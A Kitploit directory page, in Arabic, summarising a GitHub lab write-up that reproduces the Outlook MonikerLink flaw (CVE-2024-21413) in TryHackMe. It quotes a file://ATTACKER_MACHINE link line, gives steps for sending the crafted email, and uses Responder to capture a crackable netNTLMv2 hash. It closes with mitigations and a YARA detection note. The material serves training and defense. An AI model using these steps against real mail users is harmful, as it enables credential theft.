Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/gurleen-147/cve-2024-21413-microsoft-outlook-remote-code-execution-vulnerability-poc
كسر كلمات المرورتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubgurleen-147/cve-2024-21413-microsoft-outlook-remote-code-execution-vulnerability-poc

CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability-PoC

عرض المستودع
211منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

يحتوي هذا المستودع على ملاحظات بحثية ونموذج إثبات مفهوم (PoC) عالي المستوى للثغرة CVE-2024-21413، وهي ثغرة لوحظت في بعض عملاء البريد الإلكتروني عند معالجة روابط من نمط SMB/moniker المضمّنة في الرسائل. تم تنفيذ نموذج إثبات المفهوم (PoC) والتجارب الموثقة هنا في بيئة مختبرية خاضعة للتحكم على الأنظمة.

مشاركة

💻 CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability-PoC

🧩 نظرة عامة

يعيد هذا المشروع إنتاج سلوك MonikerLink (CVE-2024-21413) في بيئة TryHackMe معزولة تمامًا لإظهار كيف يمكن لبعض تنسيقات الروابط التشعبية أن تجعل Outlook يعالج رابطًا بطريقة تكشف محاولات المصادقة أو تؤدي إلى مزيد من الاستغلال. الناتج هو PoC، ومجموعة ذات أولوية من الإجراءات التخفيفية واقتراحات الكشف التي يمكن لفرق الأمان تطبيقها. لم يتم استهداف أي أنظمة حية / غير مصرح بها.


⚙️ الأدوات والتقنيات

Tool / Skillالغرض
Pythonتطوير السكربتات
Linux (Kali)النظام المستهدف
Metasploitالاستغلال والوصول
TryHackMe Labبيئة خاضعة للتحكم

🚀 الإعداد والتنفيذ

  • افتح الطرفية على نظام Linux في الجهاز المهاجم
    • أنشأت ملف Python ولصقت الكود exploit.py

      هذا الكود كتبه CMNatic ويمكن العثور عليه هنا

    • قمت بتعديل الكود ليتوافق مع بيئة جهازي.

      على سبيل المثال، في السطر التالي “<a href=“file://ATTACKER_MACHINE/test!” استبدلت "ATTACKER_MACHINE" بعنوان IP الخاص بجهازي المهاجم، وفي السطر “server = smtplib.SMTP('MAILSERVER', 25)” غيرت "MAILSERVER" إلى عنوان IP الخاص بجهازي الضحية.

    • ثم قمت بتشغيل ملف exploit.py وحصلت على الرد الذي يقول "the email has been sent"
    • لالتقاط netNTLMv2 (هذا تجزئة يمكن فك تشفيرها باستخدام John the Ripper أو أدوات أخرى، ويمكن استرجاع كلمات المرور الصريحة). لذلك استخدمت أداة تُسمى responder لالتقاط الاستجابة من الجهاز الضحية. كان الأمر المستخدم لتشغيل responder هو

      responder -I ens5

      • هنا يرمز -I إلى الواجهة واستخدمت واجهة ens5. في حالتي، أظهر الأمر خطأ، ولحل المشكلة قمت أولاً باستخدام الأمر التالي ثم أعدت المحاولة بالأمر أعلاه فنجح الأمر

        systemctl start systemd-resolved

  • ثم سجلت الدخول إلى جهازي الضحية
    • فتحت Outlook وفتحت الرابط الموجود في البريد الذي أرسلته من الجهاز المهاجم
  • بهذه الطريقة، وبمجرد نقرة واحدة على الرابط، تمكن الـ responder على جهازي المهاجم من التقاط تجزئة netNTLMv2 تجزئة netNTLMv2

يكشف إثبات المفهوم هذا عن فارق دقيق في طريقة تعامل Microsoft Outlook مع الروابط: إذ قد تفلت بعض روابط moniker من نمط file:// التي تشير إلى موارد SMB من التصفية القياسية في Outlook، وتثير محاولات مصادقة صادرة. السلوك الموضح هنا أُعيد إنتاجه في مختبر TryHackMe خاضع للتحكم الكامل، ويبرز كيف يمكن لتنسيقات روابط تبدو غير ضارة أن تخفي تفاعلات شبكية. على الرغم من إصدار تصحيحات من البائع وإرشادات للكشف، تظل الآليات الأساسية معقدة بسبب الاستخدامات المشروعة لنظامي moniker و file. والأهم أن النشاط الناتج عن إثبات المفهوم هذا يمكن ملاحظته على مستوى الشبكة (على سبيل المثال، في التقاط الحزم التي تعرض محاولات مصادقة NTLM)، مما يجعله قابلاً للتحليل الجنائي والتحقيق في الحوادث.

الكشف

تم إنشاء قاعدة Yara بواسطة Florian Roth للكشف عن رسائل البريد الإلكتروني التي تحتوي على العنصر :file:\:. صورة Wireshark

تنزيل الأداة